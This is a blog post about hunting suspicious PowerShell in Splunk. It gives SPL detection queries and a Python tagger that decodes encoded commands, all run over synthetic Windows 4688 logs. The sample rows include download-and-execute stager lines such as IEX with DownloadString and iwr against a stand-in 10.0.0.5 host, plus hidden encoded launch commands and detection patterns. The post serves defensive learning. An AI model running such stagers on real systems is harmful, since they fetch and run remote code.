Threat Hunting in Splunk: Detecting Suspicious PowerShell Activity

As part of my SOC Analyst learning journey, I’ve built my second real-world Splunk project — this time focused on detecting malicious PowerShell commands that are commonly used in cyber attacks.


Objective

Simulate and detect realistic attacker behavior using:

  • Encoded PowerShell commands

  • Silent execution (-WindowStyle Hidden, -NoProfile, -ExecutionPolicy Bypass, and their short forms -w hidden, -NoP, -ep Bypass)

  • Remote payload downloads using IEX, Invoke-WebRequest, DownloadString, and more


Dataset Used

Since I didn't have real attack telemetry to work with (and default Windows auditing doesn't even record process command lines unless the "Include command line in process creation events" policy is enabled), I used a custom-built .csv file of synthetic but realistic PowerShell logs.

Each log simulates Windows Event ID 4688 (Process Creation), including fields like:

  • _time

  • User

  • Parent_Process_Name

  • New_Process_Name

  • Command_Line

These logs included both benign and malicious PowerShell executions.


Phase 1: Explore the Logs

I started by simply displaying the data in a clean table to understand its structure:

index=* source="suspicious_powershell_logs.csv"
| table User Command_Line EventCode Parent_Process_Name _time
| sort -_time

This helped me recognize dangerous patterns such as:

  • powershell.exe -EncodedCommand ...

  • IEX (New-Object Net.WebClient).DownloadString(...)

  • PowerShell launched from winword.exe


Phase 2: Suspicious Tagging

I used conditional logic to label each log as suspicious or not using the eval command:

index=* source="suspicious_powershell_logs.csv"
| eval is_suspicious=if(
    like(Command_Line, "%EncodedCommand%") OR 
    like(Command_Line, "%IEX%") OR 
    like(Command_Line, "%DownloadString%") OR 
    like(Command_Line, "%Invoke-WebRequest%") OR 
    like(Parent_Process_Name, "%winword.exe%"),
    "true", 
    "false"
)
| table _time, User, Parent_Process_Name, Command_Line, is_suspicious
| sort -_time

This allowed me to track and filter suspicious behavior across all logs. One caveat: like() is case-sensitive, so a lowercase iex or the abbreviated -enc / -ec / -e switches slip past this version of the filter. Splunk's match() takes a PCRE regex, so match(Command_Line, "(?i)encodedcommand|-e(nc|c)?\s|\biex\b|downloadstring|invoke-webrequest") catches the same patterns regardless of case and spelling.
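To show what the Phase 2 tagging logic does when it is made case-insensitive and applied to actual 4688-style rows, here is an added Python example (not part of the original post and not the author's SPL). It reads a constructed CSV with the same columns as the dataset above, tags each row with the reasons it looks suspicious, and additionally decodes any -EncodedCommand payload (PowerShell expects base64 of UTF-16LE text) so the hidden command can be inspected. The rows, paths, the 10.0.0.5 host and the stager text are all made up for this example.

```python
import base64
import csv
import io
import re
from typing import Optional

# Case-insensitive patterns that mirror the post's eval() conditions, plus the short
# switches (-enc, -ec, -e, -nop, -w hidden, -ep bypass) that a plain like() filter misses.
SUSPICIOUS_CMD = re.compile(
    r"(?i)(?:-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{20,}"       # encoded payload
    r"|\biex\b|invoke-expression"                                     # in-memory execution
    r"|downloadstring|downloadfile|invoke-webrequest|\biwr\b"         # remote download
    r"|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile"                  # silent execution
    r"|-ep\s+bypass|-executionpolicy\s+bypass)"
)
# Office applications spawning PowerShell (macro / maldoc pattern), with or without a path.
OFFICE_PARENTS = re.compile(r"(?i)(?:^|\\)(winword|excel|powerpnt|outlook)\.exe$")
# Captures the base64 argument following -EncodedCommand or any of its abbreviations.
ENCODED_ARG = re.compile(r"(?i)-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def tag_event(row: dict) -> dict:
    """Add is_suspicious / reasons / decoded_command fields to one 4688-style row."""
    cmd = row["Command_Line"]
    decoded = decode_encoded_command(cmd)
    reasons = []
    if SUSPICIOUS_CMD.search(cmd):
        reasons.append("suspicious_switches")
    if decoded and SUSPICIOUS_CMD.search(decoded):
        reasons.append("suspicious_decoded_payload")   # the encoded script itself downloads/executes
    if OFFICE_PARENTS.search(row["Parent_Process_Name"]):
        reasons.append("office_parent")
    return {**row, "is_suspicious": bool(reasons), "reasons": reasons, "decoded_command": decoded}


def tag_events(csv_text: str) -> list:
    """Parse CSV text with the dataset's columns and tag every row."""
    return [tag_event(row) for row in csv.DictReader(io.StringIO(csv_text))]


# Constructed sample in the dataset's layout. Note that in real 4688 events
# New_Process_Name holds the full path, not just "powershell.exe".
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"  # made-up payload
SAMPLE_CSV = (
    "_time,User,Parent_Process_Name,New_Process_Name,Command_Line\n"
    f"2025-01-10T09:00:00,alice,C:\\Windows\\explorer.exe,{PS_PATH},"
    "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents\n"
    f"2025-01-10T09:05:00,bob,C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,{PS_PATH},"
    f"powershell.exe -nop -w hidden -enc {encode_powershell(STAGER)}\n"
    f"2025-01-10T09:07:00,carol,C:\\Windows\\System32\\cmd.exe,{PS_PATH},"
    "powershell.exe iex (iwr http://10.0.0.5/b)\n"                      # lowercase: like('%IEX%') misses it
    f"2025-01-10T09:10:00,svc_backup,C:\\Windows\\System32\\svchost.exe,{PS_PATH},"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1\n"
)

if __name__ == "__main__":
    for ev in tag_events(SAMPLE_CSV):
        print(f"{ev['_time']} {ev['User']:<11} suspicious={ev['is_suspicious']!s:<5} {','.join(ev['reasons'])}")
        if ev["decoded_command"]:
            print(f"    decoded: {ev['decoded_command']}")
```

The last row shows why the tag is a triage signal rather than a verdict: a scheduled backup script launched with -ExecutionPolicy Bypass is flagged by the same rule, so the dashboard needs the user and parent-process context to separate it from the Word-spawned encoded stager.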


Phase 3: Visual Dashboard Panels

I then created a dashboard with multiple panels to visualize attack patterns.

🟦 Panel 1: Timechart of PowerShell Executions

index=* source="suspicious_powershell_logs.csv" New_Process_Name="powershell.exe"
| timechart span=1h count as PowerShell_Executions

This shows the frequency of PowerShell executions over time, helping spot attack spikes. Against real 4688 events the New_Process_Name field holds the full path, so the filter would need to be New_Process_Name="*\\powershell.exe" (and PowerShell 7's pwsh.exe should be included as well).


Coming Next:

  • Top parent processes panel

  • Table of suspicious commands

  • Bar chart of most affected users

  • Alert when suspicious commands appear


What I Learned

  • How attackers hide PowerShell usage

  • How to tag suspicious logs using eval

  • How to make visual dashboards for faster triage

  • How to think like a SOC Analyst — not just write queries


Why This Project Matters

  • Real SOCs run detections like this: PowerShell is one of the most abused built-in Windows tools because it is signed, present on every host, and can run downloaded code entirely in memory

  • It maps to MITRE ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell)


[Image: PowerShell log detection dashboard]

Thanks for reading, I hope you find this article helpful. If you have any questions, advice or suggestions, feel free to message me on LinkedIn: Bilal

Written by Muhammad Bilal Akhtar